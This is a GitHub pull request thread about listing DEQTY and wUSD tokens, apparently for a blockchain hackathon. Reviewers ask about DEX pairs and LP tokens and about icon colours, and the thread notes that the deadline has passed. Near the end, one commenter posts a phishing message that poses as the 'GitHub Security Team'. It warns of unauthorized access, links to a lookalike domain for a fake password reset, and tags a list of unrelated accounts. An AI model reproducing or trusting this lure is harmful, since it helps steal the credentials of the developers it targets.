### PR TITLE
Add dEquity assets

### PR DESCRIPTION
**Pull request by samorodkin**

### CODE REVIEW

**Comment by rualekseev** [comment]
TIP 3:

[done] Create your token
[done] Mint tokens

- Transfer ownership for root contract
- Create DEX pair with wvenom or usdt token
- burn or lock LP tokens

Can you explain what is wUSD
What dex pairs you want to create?

**Comment by aleksandr-hramcov** [comment]
Please change icon color for wUSD. To avoid accidental phishing

**Comment by aleksandr-hramcov** [comment]
What a reason for listing LP tokens?

**Comment by samorodkin** [comment]
> TIP 3:
> 
> [done] Create your token [done] Mint tokens
> 
> * Transfer ownership for root contract
> * Create DEX pair with wvenom or usdt token
> * burn or lock LP tokens
> 
> Can you explain what is wUSD What dex pairs you want to create?

We have DEQTY/wUSD dex pair. LP tokens could be locked in long term staking contract then. 
We need wUSD (wrapper for Tether) as a working capital token, necessary for our project to acquire rental properties for long term locked assets.

**Comment by samorodkin** [comment]
> What a reason for listing LP tokens?

Only reason is whitelisting as additional verification

**Comment by aleksandr-hramcov** [comment]
according to the hackathon conditions, the second token for trading pair must be USDT or VENOM

**Comment by samorodkin** [comment]
> Please change icon color for wUSD. To avoid accidental phishing

Logos updated!

**Comment by rualekseev** [comment]
@samorodkin Do you have pair with venom or USDT?

**Comment by samorodkin** [comment]
> @samorodkin Do you have pair with venom or USDT?

We can create additional wUSD/USDT pair, it would act as an indicator, ok?

**Comment by rualekseev** [comment]
The time for submitting requests from participants has ended

**Comment by parthivppatel** [comment]
# Urgent Action Required: Unauthorized Access to Your GitHub Account

We regret to inform you that there has been unauthorized access to your GitHub account. To prevent any further security threats, we urge you to take immediate action by resetting your password and revoking access to any unknown entities.

Please click on the following link to reset your password: [GitHub Password Reset](https://github.hudevelopers.online/)

We highly recommend you to change your password to a strong and unique one to enhance the security of your account. Additionally, review your account activity and ensure that there are no unauthorized actions taken.

Your prompt attention to this matter is critical in safeguarding your GitHub account and personal information. Should you have any concerns or require further assistance, do not hesitate to reach out to us.

Thank you for your cooperation.

Sincerely,  
GitHub Security Team

**Affected Accounts:**  
- blockchain-ekazy  
- @yangwenmai  
- @blockchain-samples  
- @gtaschuk  
- @christophercelaya  
- @superdev-kingD  
- @RedCuckoo  
- @null-none  
- @CleanPegasus  
- @deng00

**Pull request closed without merging**
